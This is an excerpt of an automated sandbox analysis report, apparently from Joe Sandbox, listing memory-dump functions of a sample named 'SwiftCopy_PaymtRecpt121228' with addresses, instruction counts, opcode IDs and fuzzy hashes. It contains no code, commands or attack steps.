                                                    • Opcode ID: 066bdcd9917343b3c89ce10038049d18c0c014d9b8d098a0f3b54171218d2a1b
                                                    • Instruction ID: 314dc6555afb4620885b57ea49570ef7d74b98b942a46947ee65d40a360a4609
                                                    • Opcode Fuzzy Hash: 066bdcd9917343b3c89ce10038049d18c0c014d9b8d098a0f3b54171218d2a1b
                                                    • Instruction Fuzzy Hash: A1E01274E05208EFCB40EFA9D444A9DBBF0FF48310F5081AAE92597320D734AA90DF80
                                                    Function 05A54F30 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47af7bf0fc498e31b2380fbfa662d81937abc548e5ae28b83df02af01e7c769e
                                                    • Instruction ID: e74599fd0d638b89a4ce8c5fa419f09c4e8882db7dd15f65aec383a5e8128fb8
                                                    • Opcode Fuzzy Hash: 47af7bf0fc498e31b2380fbfa662d81937abc548e5ae28b83df02af01e7c769e
                                                    • Instruction Fuzzy Hash: 4BE0E5316140148FDF00DF68E449BE833B1FB48626F0040A9F415AB1A1CB34998ACB10
                                                    Function 05A50878 Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1f60e76d9370cbee41534627ce11c654b09dd7952c349404f9e46fabde99eb24
                                                    • Instruction ID: 392a86689349126167a946996ad44f94aacd16d26d5fee353483bc8de1cc680c
                                                    • Opcode Fuzzy Hash: 1f60e76d9370cbee41534627ce11c654b09dd7952c349404f9e46fabde99eb24
                                                    • Instruction Fuzzy Hash: CBE0C2B67492540BDB0A5718A4253DABBD68F88341F0980BFD54ECB7C6D97888028B9A
                                                    Function 05A5BF21 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8342bf5b30f406e0e247475babbb53b467dd7a76019ff098b54eb844b41cdbae
                                                    • Instruction ID: 6bebdeefccfc85cb6c3925238a6071fcce5e034c5706e0e930e3968bb5be4255
                                                    • Opcode Fuzzy Hash: 8342bf5b30f406e0e247475babbb53b467dd7a76019ff098b54eb844b41cdbae
                                                    • Instruction Fuzzy Hash: 20E0C230009A448FC302DB3CE9508D0BF30FF22305B0502E6F046DB62AE629D4458B20
                                                    Function 05A55F08 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b688ed58f9c22b9087fe114422f9e85c6d961b731404c5280aeb54d3ae216f0
                                                    • Instruction ID: 2dce14a2563be934ff945138fecd97532696044308c1bf20524f9d04617b131f
                                                    • Opcode Fuzzy Hash: 1b688ed58f9c22b9087fe114422f9e85c6d961b731404c5280aeb54d3ae216f0
                                                    • Instruction Fuzzy Hash: 5DE09275D1420CEFCB50DFE4D9859DDBBF9EB48200F1082AAE809A3200EB306B55DF80
                                                    Function 05A538C0 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fefe7b9f6ccb185138422209e1f6bfdc0bfe4cc346790803e8cb78a3947f6fe9
                                                    • Instruction ID: 958b9233e75d6059804170d2e4c59d49a05887ab3407628a0ef65248313ac5c8
                                                    • Opcode Fuzzy Hash: fefe7b9f6ccb185138422209e1f6bfdc0bfe4cc346790803e8cb78a3947f6fe9
                                                    • Instruction Fuzzy Hash: 91E02672C042948FD7219F84E0C4E947F21BB11320F468493D4A84B265C379DC40CF01
                                                    Function 05A59BB0 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9f566e74bf368eeddb3e1a39035f21e2f73278f3a6fba75c3a5896dee39eeb9
                                                    • Instruction ID: 1b51b951f4d3ce0373070fa90d26beb82a68cceb3902274adc9a03c2fd7b7ff2
                                                    • Opcode Fuzzy Hash: e9f566e74bf368eeddb3e1a39035f21e2f73278f3a6fba75c3a5896dee39eeb9
                                                    • Instruction Fuzzy Hash: D6E05E38185348AFD7029F29D845D85BFB9EF06364B0580A2F8C88B263C335ED16CB91
                                                    Function 05A5D260 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3e45a2f8327636d47abb98652d38503189166452a4fb16f9c12cb88e658675c
                                                    • Instruction ID: 072e76cefcb1ef28f3152e7005ac333bed2ba50f25088827166225e9973095f7
                                                    • Opcode Fuzzy Hash: f3e45a2f8327636d47abb98652d38503189166452a4fb16f9c12cb88e658675c
                                                    • Instruction Fuzzy Hash: 1AE0E23280010CAFCB00DFA8D9458ADBFB5EB44201F5085A5FC08E2291E7759BA4ABA1
                                                    Function 05A50888 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54fd0c315085487915ef71baeb5de0ee47c9e99c692f634ed1673994f7a6a51d
                                                    • Instruction ID: f108854d3f37b2bde4fcb91503507a7b33ec5a73e8d335ae697bb7ab21ead3d6
                                                    • Opcode Fuzzy Hash: 54fd0c315085487915ef71baeb5de0ee47c9e99c692f634ed1673994f7a6a51d
                                                    • Instruction Fuzzy Hash: BED05E313442280BCB09674CA01079AB6CE8FC9790F04807BEA0E8B780C9B19C0107E9
                                                    Function 05A5BF68 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 448573a3a1e180dd3bf60248b34cc24916b1bb6bc34cb2160170ac683b5ca92a
                                                    • Instruction ID: 3c38174a2d91e430434bd444e4633feda9905cc597185b4838aef7711181fd86
                                                    • Opcode Fuzzy Hash: 448573a3a1e180dd3bf60248b34cc24916b1bb6bc34cb2160170ac683b5ca92a
                                                    • Instruction Fuzzy Hash: 2CE0EC3181060CEECB40EF75D5488A97BE8FB15221F00C52AF8199A110E631D298CF90
                                                    Function 05A5BEB0 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eb87320ecb6e62f182abc631d6ed6ad387f646fea9ebb069f34433d224d55134
                                                    • Instruction ID: 81633ce610646e53a0d5d4253db6700a622a593e0b87cab8122fac7937f42c9d
                                                    • Opcode Fuzzy Hash: eb87320ecb6e62f182abc631d6ed6ad387f646fea9ebb069f34433d224d55134
                                                    • Instruction Fuzzy Hash: 8AC0121274893C17591D32585528D7E214D4B808717080079EE0F8B681CEAD1D1643EE
                                                    Function 05A529A0 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc3658f7eeecda0cc227003f180fbd502f155f231f9fee27e35c6d098ddc687c
                                                    • Instruction ID: 45b7601a069f7546f5d7a8bf90a7468f54c1dcdec9c6f45672dc8aa3eda6c132
                                                    • Opcode Fuzzy Hash: fc3658f7eeecda0cc227003f180fbd502f155f231f9fee27e35c6d098ddc687c
                                                    • Instruction Fuzzy Hash: EAD09E322452057BDA527944CC46F9E7B19E714664F144014EA084E151E273D513A7C5
                                                    Function 05A54988 Relevance: .0, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c0248850bf92873cca7eefecbbc18bd070ee62ef7d5739b5342968c4293638c
                                                    • Instruction ID: 406bf74bd2d89856220229caa2143d44436a6d1f7febafa67be9dbd019f93f6b
                                                    • Opcode Fuzzy Hash: 1c0248850bf92873cca7eefecbbc18bd070ee62ef7d5739b5342968c4293638c
                                                    • Instruction Fuzzy Hash: 5ED0A932342308AFEB40AA98CC00F863758AB28728F149224FE4C5E290D233EC12CB90
                                                    Function 05A5BC80 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 266701d00933961051bbebf815df8da03d79a06bd22d710cde593e82ca245454
                                                    • Instruction ID: 575bc82282b6b0c93e2519c1e6b780c46b6d37b23332808b044a4254c3446c62
                                                    • Opcode Fuzzy Hash: 266701d00933961051bbebf815df8da03d79a06bd22d710cde593e82ca245454
                                                    • Instruction Fuzzy Hash: 38D0A93222422C8BC7241A26A80CAAE3B48ABC46A2F408025E80382280CF788800C2E8
                                                    Function 05A5BC48 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8048d6846f6f75dcf03632493fad91607754d44ec40b097b4367c8d500ea6127
                                                    • Instruction ID: 9de6f38b284b5265b1a578cc3ac3d86ceddf8d991232ceed6aa9aedb45073042
                                                    • Opcode Fuzzy Hash: 8048d6846f6f75dcf03632493fad91607754d44ec40b097b4367c8d500ea6127
                                                    • Instruction Fuzzy Hash: DCD0C9367401249F8604AA58D514CA977AADF596B13014066F905CB331CA71EC5197D4
                                                    Function 05A59B88 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2077406cc2f054975c6269128c50dedd8349068472e0f0e38fcd3d0ec88586d0
                                                    • Instruction ID: 760309922968f5d0f8c43f95ed83bedd63befd897f1f965172e7a466c6a9d67e
                                                    • Opcode Fuzzy Hash: 2077406cc2f054975c6269128c50dedd8349068472e0f0e38fcd3d0ec88586d0
                                                    • Instruction Fuzzy Hash: 3BD05E310093804FC342BF389840888FF70EE2B214B1149ABC0C087012EA24455DC712
                                                    Function 05A5BF30 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7dc3e39adb3b03aea1ae9e924d3e9d61bed1992865d6bcb328838c3760237d80
                                                    • Instruction ID: 2e643ad44c6b87ea2f1a98bb9894b752de0a244d84bbbbe540c0544ed76d4c8d
                                                    • Opcode Fuzzy Hash: 7dc3e39adb3b03aea1ae9e924d3e9d61bed1992865d6bcb328838c3760237d80
                                                    • Instruction Fuzzy Hash: 5ED01231510B05CFC300FF6CD945864B7B4FF45705B450195E2059B335FB21F8548B51
                                                    Function 05A54998 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b94463e7a71ad4074205d72da2938aa25c0f17c34c22f2cf75d1d839fa1c46b9
                                                    • Instruction ID: 7bfacefc7470f016d8edd82b983a6d8ff330dc132503ba66ea232331b1fcccc0
                                                    • Opcode Fuzzy Hash: b94463e7a71ad4074205d72da2938aa25c0f17c34c22f2cf75d1d839fa1c46b9
                                                    • Instruction Fuzzy Hash: C4C08C36300208BFDB81AFD4C800D56776DBB08720F60D000FE0C0E201C272EC62DBA0
                                                    Function 05A5B858 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a9b1daac665d6066fdf16082c41ee02a2c6c47410abe889b9e6b46d7e331582
                                                    • Instruction ID: c02984e38cf710b9350c38933a6e1855be41ccd2852e2853d96478d0e953ce42
                                                    • Opcode Fuzzy Hash: 4a9b1daac665d6066fdf16082c41ee02a2c6c47410abe889b9e6b46d7e331582
                                                    • Instruction Fuzzy Hash: 37B09232B08638670909329D74188AFB79ECA89971304006FFD0A973409EA92D0382EA
                                                    Function 05A529B0 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9ec71c902f1d008d41949e973b1ea7faf983a2ca7ac54df9480d479c9678237
                                                    • Instruction ID: 4bdd28e130c5e0625415ccc8ce9df19a3be8a0c55fc294bfe2203adc60c9245f
                                                    • Opcode Fuzzy Hash: f9ec71c902f1d008d41949e973b1ea7faf983a2ca7ac54df9480d479c9678237
                                                    • Instruction Fuzzy Hash: D9C04C32244108BBCB027E81DD05E5ABF2ABB557A4F248055FF080D161E773D963EBD4
                                                    Function 05A567B8 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c287a3faf57057b05b2a1964e2711f6e4ab83640c9357b63392dec71db8166ce
                                                    • Instruction ID: e3da9fb53f67f1800bf9c3770deb0ed88bbd05f47de91de1009f3e9a12863065
                                                    • Opcode Fuzzy Hash: c287a3faf57057b05b2a1964e2711f6e4ab83640c9357b63392dec71db8166ce
                                                    • Instruction Fuzzy Hash: 7FC0027A0141099ECB42AF94D609FA97BE5BB69318F1988B5A54885061E7328468AB02
                                                    Function 05A5514C Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec236de46a24c976d73821fd3cb581ae53e088a212b560b73ae10ae258e8d632
                                                    • Instruction ID: 65d28fb213cacdec2ebbdc477f291d4c2baa6c17d7420e66ef92f5205b874736
                                                    • Opcode Fuzzy Hash: ec236de46a24c976d73821fd3cb581ae53e088a212b560b73ae10ae258e8d632
                                                    • Instruction Fuzzy Hash: 05C04C355550149A9641FF54C684C2EBEE5FF557107848855A544460719635C41C9B12
                                                    Function 05A5B856 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb3aadd932a165aaac8797af7a2e2d245f1ebbaabeb5170f8b0180ac6ed37b66
                                                    • Instruction ID: 0e8fa0086120f4223646f0dd1bff248a22fd8a8f62a8693952af4b620162ff39
                                                    • Opcode Fuzzy Hash: fb3aadd932a165aaac8797af7a2e2d245f1ebbaabeb5170f8b0180ac6ed37b66
                                                    • Instruction Fuzzy Hash: A0B09B35705460474A052254311446E7B26C644521304006FED59573408D380D07C189
                                                    Function 05A59BC0 Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                    • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                    • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                    Function 05A54CA1 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da8ae70b7af74241118f5c07f29eb3edac8500f77dfeee185d53ffc3425a55b5
                                                    • Instruction ID: cb05cec71007de032176773652328d3f26e2076f1624da04be0418e16be8f41e
                                                    • Opcode Fuzzy Hash: da8ae70b7af74241118f5c07f29eb3edac8500f77dfeee185d53ffc3425a55b5
                                                    • Instruction Fuzzy Hash: 66B012A2D0401147CE440560D88E30D3230D320301F5C0024E204CB3C0EE1480024551

                                                    Non-executed Functions

                                                    Function 06EF7708 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 98R
                                                    • API String ID: 0-576591972
                                                    • Opcode ID: 1e4a7d84871f7837e830f83a9fb51d607008c50628076c157617c3134e1bd045
                                                    • Instruction ID: b7ca501f6da9d013ea6cba6f61a2a7a4daff234bdf059df45fb5314ebbc3d856
                                                    • Opcode Fuzzy Hash: 1e4a7d84871f7837e830f83a9fb51d607008c50628076c157617c3134e1bd045
                                                    • Instruction Fuzzy Hash: 2E713574E2530A9FDB44CF99E9819EEFBB2FB88350F109429D514AB394D334AA41CF94
                                                    Function 06EFE7E0 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: w7e^
                                                    • API String ID: 0-1657886525
                                                    • Opcode ID: f8dd81f55446d6231e30010641422cbf6bd833a01d662b7b212ccdb420547af3
                                                    • Instruction ID: 3fcab9602f0b362b353513c67e25dcb92d59d57714d76f97231f8938723b05e2
                                                    • Opcode Fuzzy Hash: f8dd81f55446d6231e30010641422cbf6bd833a01d662b7b212ccdb420547af3
                                                    • Instruction Fuzzy Hash: 5A4139B4E25349EFDF44CFA6C4405EEFBB2BB89200F14A42AC515B7264D7385642CFA8
                                                    Function 06EFB279 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0ni
                                                    • API String ID: 0-1488673370
                                                    • Opcode ID: 61d3628ab5cc0c006223aaca7377c30d883dc317fffe14ca311b2d997667d2e9
                                                    • Instruction ID: 30ba1ed204b0c05c389b42d3b4a5ba6e521fd565c0cfb2083b6a78c611b65aad
                                                    • Opcode Fuzzy Hash: 61d3628ab5cc0c006223aaca7377c30d883dc317fffe14ca311b2d997667d2e9
                                                    • Instruction Fuzzy Hash: 46515971E156188BEB68CF6B9D4479EFBF3AFC8301F14C1BA950CA6254EB301A858F51
                                                    Function 06EFE7D0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: w7e^
                                                    • API String ID: 0-1657886525
                                                    • Opcode ID: 1cbe259ea9d305e40a74f964654f7407d2ab8c166fc766ed36bfe78ef5241877
                                                    • Instruction ID: cd8652d498dcdc9e66a418c8b96e775eaba07a16f0ca586efa41c68fb55892fa
                                                    • Opcode Fuzzy Hash: 1cbe259ea9d305e40a74f964654f7407d2ab8c166fc766ed36bfe78ef5241877
                                                    • Instruction Fuzzy Hash: 6F415A74E25359EFDB44CFA6C8405EEFBB2BB89300F18A86AC115B7264D7385641CF98
                                                    Function 05A57A08 Relevance: .5, Instructions: 536COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81c76fdeb24317aedb7c9f55544f15b26d5f249e702f3768ac75d6833f0291ff
                                                    • Instruction ID: 679db183cceda041773dc85292f8a0292fadba1e46d1a940d9c7288ee5ac83e6
                                                    • Opcode Fuzzy Hash: 81c76fdeb24317aedb7c9f55544f15b26d5f249e702f3768ac75d6833f0291ff
                                                    • Instruction Fuzzy Hash: EC42C374A0021A8FDB64CF59C984BA9FBB2FF48310F15C1A9D819AB751DB31AE85CF50
                                                    Function 06F4904F Relevance: .3, Instructions: 329COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e21708a026e3e4a14ec758c9f2337b1403a0458cf00fd376d8ab39002cff932
                                                    • Instruction ID: 344b5989192b6576f412b9ee319234accb8b542692cfe7fce6e10294091454bd
                                                    • Opcode Fuzzy Hash: 3e21708a026e3e4a14ec758c9f2337b1403a0458cf00fd376d8ab39002cff932
                                                    • Instruction Fuzzy Hash: D7D19E70E002188FCB54DF98C5846AEBFF2BF89305F24C1A9D418AB656D771DD82CBA0
                                                    Function 05810130 Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa8a53e571e84c5aa6d8dd0f1207ca1e7838a7ad829a7781c381ec65b295f18e
                                                    • Instruction ID: 6c8ba1cf6ae5100a5f06a155cd748413bc764c6f43d0760c1e341afb38f2e81f
